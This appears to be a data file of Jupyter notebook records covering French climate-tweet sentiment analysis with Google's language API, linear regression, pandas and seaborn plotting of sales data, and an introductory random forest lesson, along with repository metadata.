"Requirement already satisfied: word2number in /usr/local/lib/python3.7/dist-packages (1.1)\nRequirement already satisfied: contractions in /usr/local/lib/python3.7/dist-packages (0.0.48)\nRequirement already satisfied: textsearch>=0.0.21 in /usr/local/lib/python3.7/dist-packages (from contractions) (0.0.21)\nRequirement already satisfied: pyahocorasick in /usr/local/lib/python3.7/dist-packages (from textsearch>=0.0.21->contractions) (1.4.1)\nRequirement already satisfied: anyascii in /usr/local/lib/python3.7/dist-packages (from textsearch>=0.0.21->contractions) (0.1.7)\n"
],
[
"from pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom google.colab import auth\nfrom oauth2client.client import GoogleCredentials\nimport argparse\nfrom google.cloud import language_v1\n",
"_____no_output_____"
]
],
[
[
"attribution sheet",
"_____no_output_____"
]
],
[
[
"from google.colab import auth\nauth.authenticate_user()\n\nimport gspread\nfrom oauth2client.client import GoogleCredentials\n\ngc = gspread.authorize(GoogleCredentials.get_application_default())\n\nsh = gc.open('COUNTERPOINT_extrait_tweet')\n\n\nshfr = sh.worksheet('climate fr') \n\n\n\n",
"_____no_output_____"
]
],
[
[
"pre-processing data",
"_____no_output_____"
]
],
[
[
"from bs4 import BeautifulSoup\nimport spacy\nimport re\nfrom word2number import w2n\nimport contractions",
"_____no_output_____"
],
[
"shfr_html=[]\nfor i in range(20):\n text = text = \"{}\".format([shfr.cell(i+2, 4).value])\n def strip_html_tags(text):\n \"\"\"remove html tags from text\"\"\"\n linkr = re.sub(r\"http\\S+\", \"\", text)\n hashr=re.sub(r\"#\",\"\",linkr)\n result=hashr.replace(\"\\\\n\", \" \").replace(\"\\\\\",\"\").replace(\"-\", \" \").replace(\"@\", \"\").replace(\"\\\"\",\"\").replace(\"é\",\"e\").replace(\"è\",\"e\").replace(\"'\", \" \").replace(\"’\", \" \")\n \n soup = BeautifulSoup(result, \"html.parser\")\n \n stripped_text = soup.get_text(separator=\" \")\n return stripped_text\n shfr_html.append(\"{}\".format(strip_html_tags(text)))\n\n",
"_____no_output_____"
],
[
"\nprint(shfr_html[7])\n\n\n",
"[ Il reste 131 jours avant la fin de l annee. Et pourtant, nous avons consomme toutes les ressources que la planete peut generer en 1 an. C est le JourDuDepassement. Continuons d agir ! 30 milliards d euros du plan de relance seront consacres à la transition ecologique. ]\n"
]
],
[
[
"sentiment analyze",
"_____no_output_____"
]
],
[
[
"from google.cloud import language\nfrom google.cloud.language import enums\nfrom google.cloud.language import types\nfrom google.oauth2 import service_account\n\ncredentials = service_account.Credentials.from_service_account_file('apikey.json')\nclient = language.LanguageServiceClient(credentials=credentials)\nfor i in range (10):\n \n def tweet(client):\n\n results=[]\n text = \"{}\".format(shfr_html[i])\n #Setting the Service Account key\n \n \n document = types.Document(\n content=text,\n type=enums.Document.Type.PLAIN_TEXT)\n sentiment = client.analyze_sentiment(document=document).document_sentiment\n\n \n\n\n if sentiment.score <0 :\n results.append(\"négatif\")\n elif sentiment.score >0:\n results.append(\"positif\")\n else:\n results.append(\"mixe ou incertain\")\n\n results.append('Text: {} '.format(text))\n \n results.append(' Sentiment: {}, Magnitude{}'.format(sentiment.score, sentiment.magnitude))\n print(result)\n print(sentiment)\n print (client.analyze_sentiment(document=document))\n return results\n \n\n result= tweet(client)\n shfr.update_cell( i+2,11, ' '.join(result))",
"['positif', 'Text: [🇺🇸 FLASH Joe Biden annonce que s il est elu, il rejoindra l accord de Paris sur le climat des le premier jour de sa presidence. (AFP)] ', ' Sentiment: 0.10000000149011612, Magnitude0.20000000298023224']\nmagnitude: 0.30000001192092896\nscore: -0.30000001192092896\n\ndocument_sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ le rechauffement climatique, la menace d une 3e guerre ptdr les etudes pourquoi faire ? ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n }\n}\n\n['négatif', 'Text: [ le rechauffement climatique, la menace d une 3e guerre ptdr les etudes pourquoi faire ? ] ', ' Sentiment: -0.30000001192092896, Magnitude0.30000001192092896']\n\ndocument_sentiment {\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[L empreinte carbone de ton dropshipping on peut en parler aussi ?]\"\n begin_offset: -1\n }\n sentiment {\n }\n}\n\n['mixe ou incertain', 'Text: [L empreinte carbone de ton dropshipping on peut en parler aussi ?] ', ' Sentiment: 0.0, Magnitude0.0']\nmagnitude: 0.20000000298023224\nscore: -0.20000000298023224\n\ndocument_sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ C est pour \\303\\247a que scientifiquement on appelle \\303\\247a un dereglement climatique... ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\n\n['négatif', 'Text: [ C est pour ça que scientifiquement on appelle ça un dereglement climatique... ] ', ' Sentiment: -0.20000000298023224, Magnitude0.20000000298023224']\nmagnitude: 0.4000000059604645\n\ndocument_sentiment {\n magnitude: 0.4000000059604645\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ 24 morts, 500 millions d animaux morts, etat d urgence declare, 5 millions d hectares br\\303\\273les, des fumees etouffantes...\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n }\n}\nsentences {\n text {\n content: \"Oui le dereglement climatique EXISTE et les phenomenes estivaux tels que les feux en Australie S INTENSIFIENT PrayForAustralia AustraliaBurning\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.10000000149011612\n score: 0.10000000149011612\n }\n}\n\n['mixe ou incertain', 'Text: [ 24 morts, 500 millions d animaux morts, etat d urgence declare, 5 millions d hectares brûles, des fumees etouffantes... Oui le dereglement climatique EXISTE et les phenomenes estivaux tels que les feux en Australie S INTENSIFIENT PrayForAustralia AustraliaBurning ', ' Sentiment: 0.0, Magnitude0.4000000059604645']\nmagnitude: 0.10000000149011612\n\ndocument_sentiment {\n magnitude: 0.10000000149011612\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[Destruction en cours du fameux mur USA Mexique de Donald Trump par l ouragan Hanna.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"Changement climatique 1\\342\\200\\2230 Trump\"\n begin_offset: -1\n }\n sentiment {\n }\n}\n\n['mixe ou incertain', 'Text: [Destruction en cours du fameux mur USA Mexique de Donald Trump par l ouragan Hanna. Changement climatique 1–0 Trump ', ' Sentiment: 0.0, Magnitude0.10000000149011612']\nmagnitude: 0.800000011920929\nscore: 0.20000000298023224\n\ndocument_sentiment {\n magnitude: 0.800000011920929\n score: 0.20000000298023224\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ Solidarite avec le peuple australien face aux incendies qui ravagent leur pays.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.10000000149011612\n score: -0.10000000149011612\n }\n}\nsentences {\n text {\n content: \"Ce matin, j ai appele ScottMorrisonMP pour offrir notre aide operationnelle immediate pour lutter contre les feux, proteger la population et preserver la biodiversite. ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.6000000238418579\n score: 0.6000000238418579\n }\n}\n\n['positif', 'Text: [ Solidarite avec le peuple australien face aux incendies qui ravagent leur pays. Ce matin, j ai appele ScottMorrisonMP pour offrir notre aide operationnelle immediate pour lutter contre les feux, proteger la population et preserver la biodiversite. ] ', ' Sentiment: 0.20000000298023224, Magnitude0.800000011920929']\nmagnitude: 1.399999976158142\nscore: 0.10000000149011612\n\ndocument_sentiment {\n magnitude: 1.399999976158142\n score: 0.10000000149011612\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[Toutes mes felicitations barbarapompili, ministre de la Transition ecologique.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"Pour ce qui est de l ecologie, je ne sais pas.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"Mais pour ce qui est de la transition, c est incontestablement une experte: verte, puis vallsiste, puis macroniste.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"On attend la suite avec impatience.]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.8999999761581421\n score: 0.8999999761581421\n }\n}\n\n['positif', 'Text: [Toutes mes felicitations barbarapompili, ministre de la Transition ecologique. Pour ce qui est de l ecologie, je ne sais pas. Mais pour ce qui est de la transition, c est incontestablement une experte: verte, puis vallsiste, puis macroniste. On attend la suite avec impatience.] ', ' Sentiment: 0.10000000149011612, Magnitude1.399999976158142']\nmagnitude: 1.2000000476837158\n\ndocument_sentiment {\n magnitude: 1.2000000476837158\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[ Il reste 131 jours avant la fin de l annee.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"Et pourtant, nous avons consomme toutes les ressources que la planete peut generer en 1 an.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: -0.30000001192092896\n }\n}\nsentences {\n text {\n content: \"C est le JourDuDepassement.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.10000000149011612\n score: 0.10000000149011612\n }\n}\nsentences {\n text {\n content: \"Continuons d agir !\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: -0.20000000298023224\n }\n}\nsentences {\n text {\n content: \"30 milliards d euros du plan de relance seront consacres \\303\\240 la transition ecologique. ]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.30000001192092896\n score: 0.30000001192092896\n }\n}\n\n['mixe ou incertain', 'Text: [ Il reste 131 jours avant la fin de l annee. Et pourtant, nous avons consomme toutes les ressources que la planete peut generer en 1 an. C est le JourDuDepassement. Continuons d agir ! 30 milliards d euros du plan de relance seront consacres à la transition ecologique. ] ', ' Sentiment: 0.0, Magnitude1.2000000476837158']\nmagnitude: 0.6000000238418579\nscore: -0.20000000298023224\n\ndocument_sentiment {\n magnitude: 0.6000000238418579\n score: -0.20000000298023224\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[\\360\\237\\224\\264 [FLASH] Au moins 33 virus ont ete retrouves dans 2 blocs de glace qui proviennent de l Himalaya.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"28 d entre eux sont inconnus, on ignore les effets qu auront les virus sur notre sante lors de la fonte des glaces, d\\303\\273 au rechauffement climatique.\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.5\n score: -0.5\n }\n}\nsentences {\n text {\n content: \"(Vice)\"\n begin_offset: -1\n }\n sentiment {\n }\n}\n\n['négatif', 'Text: [🔴 [FLASH] Au moins 33 virus ont ete retrouves dans 2 blocs de glace qui proviennent de l Himalaya. 28 d entre eux sont inconnus, on ignore les effets qu auront les virus sur notre sante lors de la fonte des glaces, dû au rechauffement climatique. (Vice) ', ' Sentiment: -0.20000000298023224, Magnitude0.6000000238418579']\nmagnitude: 0.20000000298023224\nscore: 0.10000000149011612\n\ndocument_sentiment {\n magnitude: 0.20000000298023224\n score: 0.10000000149011612\n}\nlanguage: \"fr\"\nsentences {\n text {\n content: \"[\\360\\237\\207\\272\\360\\237\\207\\270 FLASH Joe Biden annonce que s il est elu, il rejoindra l accord de Paris sur le climat des le premier jour de sa presidence.\"\n begin_offset: -1\n }\n sentiment {\n }\n}\nsentences {\n text {\n content: \"(AFP)]\"\n begin_offset: -1\n }\n sentiment {\n magnitude: 0.20000000298023224\n score: 0.20000000298023224\n }\n}\n\n"
],
[
"print(results)",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb503df5a229481ed99edaf3ed3dfa2b164a0813 | 15,284 | ipynb | Jupyter Notebook | 1.Simple Linear Regression/4.Adverts/Linear_Regression_Tut.ipynb | OkomoJacob/MLAIDS | 5f9d3394fede8fd8625577b44844f2626b205844 | [
"MIT"
] | null | null | null | 1.Simple Linear Regression/4.Adverts/Linear_Regression_Tut.ipynb | OkomoJacob/MLAIDS | 5f9d3394fede8fd8625577b44844f2626b205844 | [
"MIT"
] | null | null | null | 1.Simple Linear Regression/4.Adverts/Linear_Regression_Tut.ipynb | OkomoJacob/MLAIDS | 5f9d3394fede8fd8625577b44844f2626b205844 | [
"MIT"
] | null | null | null | 86.840909 | 12,038 | 0.866985 | [
[
[
"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression",
"_____no_output_____"
],
[
"# Importing the dataset\nx = np.array([1, 14, 20, 40, 60, 71, 80, 95, 120, 125])\ny = np.array([3, 20, 90, 110, 130, 170, 150, 220, 260, 300])",
"_____no_output_____"
],
[
"#Create a linear reg variable\nlinreg = LinearRegression()",
"_____no_output_____"
],
[
"# We are now reshaping the data in a process called pre-processing\nx = x.reshape(-1, 1)",
"_____no_output_____"
],
[
"# Fit a linear reg line\nlinreg.fit(x, y)",
"_____no_output_____"
],
[
"# Make it predict using the fit\ny_pred = linreg.predict(x)",
"_____no_output_____"
],
[
"plt.scatter(x, y)\nplt.plot(x, y_pred, color = 'red')\nplt.show()",
"_____no_output_____"
],
[
"# y = mx + c\nprint(linreg.coef_) #m",
"[2.16341138]\n"
],
[
"print(linreg.intercept_) #c",
"9.870447474912822\n"
],
[
"import seaborn as sns\n%matplotlib inline",
"_____no_output_____"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code",
"code"
]
] |
cb5053edd04b5aec9c53e7969fcb6d3562ccca9d | 5,053 | ipynb | Jupyter Notebook | 6_2_plotting_with_pandas_exercises.ipynb | jhugoAthena/atom | 754f0bb6039cc1dec57caf0e0ff8a421385e5441 | [
"MIT"
] | null | null | null | 6_2_plotting_with_pandas_exercises.ipynb | jhugoAthena/atom | 754f0bb6039cc1dec57caf0e0ff8a421385e5441 | [
"MIT"
] | null | null | null | 6_2_plotting_with_pandas_exercises.ipynb | jhugoAthena/atom | 754f0bb6039cc1dec57caf0e0ff8a421385e5441 | [
"MIT"
] | null | null | null | 21.686695 | 249 | 0.431031 | [
[
[
"<a href=\"https://colab.research.google.com/github/jhugoAthena/atom/blob/master/6_2_plotting_with_pandas_exercises.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"## `Import Pandas as pd`\n## `%matplotlib inline`",
"_____no_output_____"
]
],
[
[
"import pandas as pd\n%matplotlib inline",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
],
[
[
"## Load in the file `price_data.csv` into an object called `data`\nLook at its first few rows using `.head()`.",
"_____no_output_____"
]
],
[
[
"price_data = 'https://ga-instruction.s3.amazonaws.com/assets/Data%20Fundamentals/linked-csv-files/price_data.csv'\ndata = pd.read_csv(price_data)",
"_____no_output_____"
]
],
[
[
"## Use `.plot()` on the entire `DataFrame`.",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"## Use `reset_index` to make a separate column out of the index.",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"## Make it a scatterplot by passing in `kind='scatter'`.",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"## Make it a histogram of prices by passing in `kind=\"hist\"` and `y=price`.",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
]
],
[
[
"## Use `.value_counts()` to count the number of entries per country in the `country` column and plot using `kind='bar'`.",
"_____no_output_____"
]
],
[
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
],
[
"",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
]
] |
cb50580b5fd062c036c89121e0129cff6ec8ef54 | 271,388 | ipynb | Jupyter Notebook | DataVisualization/3_Plotting_Categorical_Data.ipynb | brijesh1100/python-basic | 12b567a678d46c970efa491115e2d9e6894f91a1 | [
"Apache-2.0"
] | 1 | 2021-07-18T06:05:47.000Z | 2021-07-18T06:05:47.000Z | DataVisualization/3_Plotting_Categorical_Data.ipynb | brijesh1100/python-basic | 12b567a678d46c970efa491115e2d9e6894f91a1 | [
"Apache-2.0"
] | null | null | null | DataVisualization/3_Plotting_Categorical_Data.ipynb | brijesh1100/python-basic | 12b567a678d46c970efa491115e2d9e6894f91a1 | [
"Apache-2.0"
] | 1 | 2021-08-22T05:08:14.000Z | 2021-08-22T05:08:14.000Z | 298.556656 | 42,596 | 0.91808 | [
[
[
"# Plotting Categorical Data\n\nIn this section, we will:\n- Plot distributions of data across categorical variables\n- Plot aggregate/summary statistics across categorical variables\n\n\n## Plotting Distributions Across Categories\n\nWe have seen how to plot distributions of data. Often, the distributions reveal new information when you plot them across categorical variables.\n\nLet's see some examples.",
"_____no_output_____"
]
],
[
[
"# loading libraries and reading the data\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# set seaborn theme if you prefer\nsns.set(style=\"white\")\n\n# read data\nmarket_df = pd.read_csv(\"./global_sales_data/market_fact.csv\")\ncustomer_df = pd.read_csv(\"./global_sales_data/cust_dimen.csv\")\nproduct_df = pd.read_csv(\"./global_sales_data/prod_dimen.csv\")\nshipping_df = pd.read_csv(\"./global_sales_data/shipping_dimen.csv\")\norders_df = pd.read_csv(\"./global_sales_data/orders_dimen.csv\")\n",
"_____no_output_____"
]
],
[
[
"### Boxplots \n\nWe had created simple boxplots such as the ones shown below. Now, let's plot multiple boxplots and see what they can tell us the distribution of variables across categories.",
"_____no_output_____"
]
],
[
[
"# boxplot of a variable\nsns.boxplot(y=market_df['Sales'])\nplt.yscale('log')\nplt.show()\n",
"_____no_output_____"
]
],
[
[
"Now, let's say you want to **compare the (distribution of) sales of various product categories**. Let's first merge the product data into the main dataframe.",
"_____no_output_____"
]
],
[
[
"# merge the dataframe to add a categorical variable \ndf = pd.merge(market_df, product_df, how='inner', on='Prod_id')\ndf.head()",
"_____no_output_____"
],
[
"# boxplot of a variable across various product categories\nsns.boxplot(x='Product_Category', y='Sales', data=df)\nplt.yscale('log')\nplt.show()",
"_____no_output_____"
]
],
[
[
"So this tells you that the sales of office supplies are, on an average, lower than the other two categories. The sales of technology and furniture categories seem much better. Note that each order can have multiple units of products sold, so Sales being higher/lower may be due to price per unit or the number of units.\n\nLet's now plot the other important variable - Profit.",
"_____no_output_____"
]
],
[
[
"# boxplot of a variable across various product categories\nsns.boxplot(x='Product_Category', y='Profit', data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Profit clearly has some *outliers* due to which the boxplots are unreadable. Let's remove some extreme values from Profit (for the purpose of visualisation) and try plotting.",
"_____no_output_____"
]
],
[
[
"df = df[(df.Profit<1000) & (df.Profit>-1000)]\n\n# boxplot of a variable across various product categories\nsns.boxplot(x='Product_Category', y='Profit', data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"You can see that though the category 'Technology' has better sales numbers than others, it is also the one where the **most loss making transactions** happen. You can drill further down into this.\n\n",
"_____no_output_____"
]
],
[
[
"# adjust figure size\nplt.figure(figsize=(10, 8))\n\n# subplot 1: Sales\nplt.subplot(1, 2, 1)\nsns.boxplot(x='Product_Category', y='Sales', data=df)\nplt.title(\"Sales\")\nplt.yscale('log')\n\n# subplot 2: Profit\nplt.subplot(1, 2, 2)\nsns.boxplot(x='Product_Category', y='Profit', data=df)\nplt.title(\"Profit\")\n\nplt.show()",
"_____no_output_____"
]
],
[
[
"Now that we've compared Sales and Profits across product categories, let's drill down further and do the same across **another categorical variable** - Customer_Segment. \n\nWe'll need to add the customer-related attributes (dimensions) to this dataframe.",
"_____no_output_____"
]
],
[
[
"# merging with customers df\ndf = pd.merge(df, customer_df, how='inner', on='Cust_id')\ndf.head()",
"_____no_output_____"
],
[
"# boxplot of a variable across various product categories\nsns.boxplot(x='Customer_Segment', y='Profit', data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"You can **visualise the distribution across two categorical variables** using the ```hue= ``` argument.",
"_____no_output_____"
]
],
[
[
"# set figure size for larger figure\nplt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n\n# specify hue=\"categorical_variable\"\nsns.boxplot(x='Customer_Segment', y='Profit', hue=\"Product_Category\", data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Across all customer segments, the product category ```Technology``` seems to be doing fairly well, though ```Furniture``` is incurring losses across all segments. \n\nNow say you are curious to know why certain orders are making huge losses. One of your hypothesis is that the *shipping cost is too high in some orders*. You can **plot derived variables** as well, such as *shipping cost as percentage of sales amount*. ",
"_____no_output_____"
]
],
[
[
"# plot shipping cost as percentage of Sales amount\nsns.boxplot(x=df['Product_Category'], y=100*df['Shipping_Cost']/df['Sales'])\nplt.ylabel(\"100*(Shipping cost/Sales)\")\nplt.show()",
"_____no_output_____"
]
],
[
[
"## Plotting Aggregated Values across Categories\n\n\n### Bar Plots - Mean, Median and Count Plots\n\n\nBar plots are used to **display aggregated values** of a variable, rather than entire distributions. This is especially useful when you have a lot of data which is difficult to visualise in a single figure. \n\nFor example, say you want to visualise and *compare the average Sales across Product Categories*. The ```sns.barplot()``` function can be used to do that.\n",
"_____no_output_____"
]
],
[
[
"# bar plot with default statistic=mean\nsns.barplot(x='Product_Category', y='Sales', data=df)\nplt.show()",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"Note that, **by default, seaborn plots the mean value across categories**, though you can plot the count, median, sum etc. Also, barplot computes and shows the confidence interval of the mean as well.",
"_____no_output_____"
]
],
[
[
"# Create 2 subplots for mean and median respectively\n\n# increase figure size \nplt.figure(figsize=(12, 6))\n\n# subplot 1: statistic=mean\nplt.subplot(1, 2, 1)\nsns.barplot(x='Product_Category', y='Sales', data=df)\nplt.title(\"Average Sales\")\n\n# subplot 2: statistic=median\nplt.subplot(1, 2, 2)\nsns.barplot(x='Product_Category', y='Sales', data=df, estimator=np.median)\nplt.title(\"Median Sales\")\n\nplt.show()\n",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"Look at that! The mean and median sales across the product categories tell different stories. This is because of some outliers (extreme values) in the ```Furniture``` category, distorting the value of the mean.\n\n\nYou can add another categorical variable in the plot.",
"_____no_output_____"
]
],
[
[
"# set figure size for larger figure\nplt.figure(num=None, figsize=(12, 8), dpi=80, facecolor='w', edgecolor='k')\n\n# specify hue=\"categorical_variable\"\nsns.barplot(x='Customer_Segment', y='Profit', hue=\"Product_Category\", data=df, estimator=np.median)\nplt.show()",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"The plot neatly shows the median profit across product categories and customer segments. It says that:\n- On an average, only Technology products in Small Business and Corporate (customer) categories are profitable.\n- Furniture is incurring losses across all Customer Segments\n\n\nCompare this to the boxplot we had created above - though the bar plots contains 'lesser information' than the boxplot, it is more revealing.\n\n<hr>",
"_____no_output_____"
],
[
"When you want to visualise having a large number of categories, it is helpful to plot the categories across the y-axis. Let's now *drill down into product sub categories*. ",
"_____no_output_____"
]
],
[
[
"# Plotting categorical variable across the y-axis\nplt.figure(figsize=(10, 8))\nsns.barplot(x='Profit', y=\"Product_Sub_Category\", data=df, estimator=np.median)\nplt.show()",
"c:\\users\\brsingh\\appdata\\local\\programs\\python\\python36\\lib\\site-packages\\scipy\\stats\\stats.py:1713: FutureWarning: Using a non-tuple sequence for multidimensional indexing is deprecated; use `arr[tuple(seq)]` instead of `arr[seq]`. In the future this will be interpreted as an array index, `arr[np.array(seq)]`, which will result either in an error or a different result.\n return np.add.reduce(sorted[indexer] * weights, axis=axis) / sumval\n"
]
],
[
[
"The plot clearly shows which sub categories are incurring the heaviest losses - Copiers and Fax, Tables, Chairs and Chairmats are the most loss making categories. \n\n\nYou can also plot the **count of the observations** across categorical variables using ```sns.countplot()```.",
"_____no_output_____"
]
],
[
[
"# Plotting count across a categorical variable \nplt.figure(figsize=(10, 8))\nsns.countplot(y=\"Product_Sub_Category\", data=df)\nplt.show()",
"_____no_output_____"
]
],
[
[
"Note the most loss making category - Copiers and Fax - has a very few number of orders. \n\n\nIn the next section, we will see how to plot Time Series data.",
"_____no_output_____"
],
[
"## Additional Stuff on Plotting Categorical Variables\n\n1. <a href=\"https://seaborn.pydata.org/tutorial/categorical.html\">Seaborn official tutorial on categorical variables</a>",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
]
] |
cb508055f78260ef54522469444a014363b0d2d0 | 30,715 | ipynb | Jupyter Notebook | Notebook/Lesson-random-forests/solution-code/solution-code.ipynb | sgdataguru/ITE_Machine_Learning_Workshop | 257e5c1e80341137fcb0d6f291d89dad6d551c01 | [
"Apache-2.0"
] | null | null | null | Notebook/Lesson-random-forests/solution-code/solution-code.ipynb | sgdataguru/ITE_Machine_Learning_Workshop | 257e5c1e80341137fcb0d6f291d89dad6d551c01 | [
"Apache-2.0"
] | null | null | null | Notebook/Lesson-random-forests/solution-code/solution-code.ipynb | sgdataguru/ITE_Machine_Learning_Workshop | 257e5c1e80341137fcb0d6f291d89dad6d551c01 | [
"Apache-2.0"
] | null | null | null | 28.598696 | 630 | 0.432134 | [
[
[
"\n<img src=\"https://maltem.com/wp-content/uploads/2020/04/LOGO_MALTEM.png\" style=\"float: left; margin: 20px; height: 55px\">\n\n<br>\n<br>\n<br>\n<br>\n\n\n# Random Forests and ExtraTrees\n\n\n_Authors: Matt Brems (DC), Riley Dallas (AUS)_\n\n---",
"_____no_output_____"
],
[
"## Random Forests\n---\n\nWith bagged decision trees, we generate many different trees on pretty similar data. These trees are **strongly correlated** with one another. Because these trees are correlated with one another, they will have high variance. Looking at the variance of the average of two random variables $T_1$ and $T_2$:\n\n$$\n\\begin{eqnarray*}\nVar\\left(\\frac{T_1+T_2}{2}\\right) &=& \\frac{1}{4}\\left[Var(T_1) + Var(T_2) + 2Cov(T_1,T_2)\\right]\n\\end{eqnarray*}\n$$\n\nIf $T_1$ and $T_2$ are highly correlated, then the variance will about as high as we'd see with individual decision trees. By \"de-correlating\" our trees from one another, we can drastically reduce the variance of our model.\n\nThat's the difference between bagged decision trees and random forests! We're going to do the same thing as before, but we're going to de-correlate our trees. This will reduce our variance (at the expense of a small increase in bias) and thus should greatly improve the overall performance of the final model.\n\nSo how do we \"de-correlate\" our trees?\n\nRandom forests differ from bagging decision trees in only one way: they use a modified tree learning algorithm that selects, at each split in the learning process, a **random subset of the features**. This process is sometimes called the *random subspace method*.\n\nThe reason for doing this is the correlation of the trees in an ordinary bootstrap sample: if one or a few features are very strong predictors for the response variable (target output), these features will be used in many/all of the bagged decision trees, causing them to become correlated. By selecting a random subset of features at each split, we counter this correlation between base trees, strengthening the overall model.\n\nFor a problem with $p$ features, it is typical to use:\n\n- $\\sqrt{p}$ (rounded down) features in each split for a classification problem.\n- $p/3$ (rounded down) with a minimum node size of 5 as the default for a regression problem.\n\nWhile this is a guideline, Hastie and Tibshirani (authors of Introduction to Statistical Learning and Elements of Statistical Learning) have suggested this as a good rule in the absence of some rationale to do something different.\n\nRandom 